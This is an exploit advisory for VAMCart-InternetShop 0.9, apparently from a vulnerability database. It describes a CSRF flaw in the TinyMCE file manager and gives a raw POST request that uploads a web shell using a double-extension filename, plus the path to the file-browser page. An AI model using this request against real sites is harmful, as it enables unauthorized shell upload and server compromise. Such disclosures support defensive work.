VAMCart-InternetShop 0.9 Cross Site Request Forgery / Shell Upload

2012.05.30
Credit: KedAns-Dz
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

### # Title : VAMCart-InternetShop v0.9 (XSRF/FileUpload) Vulnerabilities # Author : KedAns-Dz # E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com) # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701) # Web Site : www.1337day.com | www.inj3ct0rs.com # FaCeb0ok : http://fb.me/Inj3ct0rK3d # Friendly Sites : www.dis9.com * www.r00tw0rm.com * www.exploit-id.com # platform : php # Type : Multiple # Security Risk : Critical # Tested on : Windows XP-SP3 (Fr) / Ubuntu 10.10 ### ## # | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << | # | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 | # | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * soucha | # | ***** KinG Of PiraTeS * The g0bl!n * dr.R!dE ***** | # | ------------------------------------------------- < | ## # <3 <3 Greetings t0 Palestine <3 <3 # Download : [http://vamcart.googlecode.com/files/vamcart.zip] --> Description : This exploits/p0c a cross-site request forgery (CSRF/XSRF) Vulnerability in Tiny_Mce File's Manager in VMCart InternetShop CMS v0.9, allow remote attackers to hijack the authentication of administrators for requests that upload a file via TinyMCE --> DATA 4 Send/Upload 'a File/Shell : POST http://192.168.1.2/vmc/upload_file.php?folder=/files/&type=file User-Agent: [ Your User Agent ] Connection: keep-alive Content-Type: application/octet-stream Content-Disposition: form-data; name=\"Filedata\"; filename=\"Inj3ct0rK3d.ph.p" Content-Length: [ u r Shell/File Length ] --> And Post/Submit DATA <-- --> Or Use The Browser : http://192.168.1.2/vmc/js/tiny_mce/plugins/tinybrowser/tinybrowser.php http://[Target-Host]/[path]/js/tiny_mce/plugins/tinybrowser/tinybrowser.php ### << ThE|End #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=============================================== # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Caddy-Dz * Mennouchi Islem * Rizky Oz * HMD-Cr3w # +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection # NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta * HD Moore # Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X * KeyStr0ke # JF * Kha&miX * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * L3b-r1Z * Chevr0sky * Black-ID * Dis9-UE # packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * All Security and Exploits Webs .. #=============

References:

http://fb.me/Inj3ct0rK3d


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top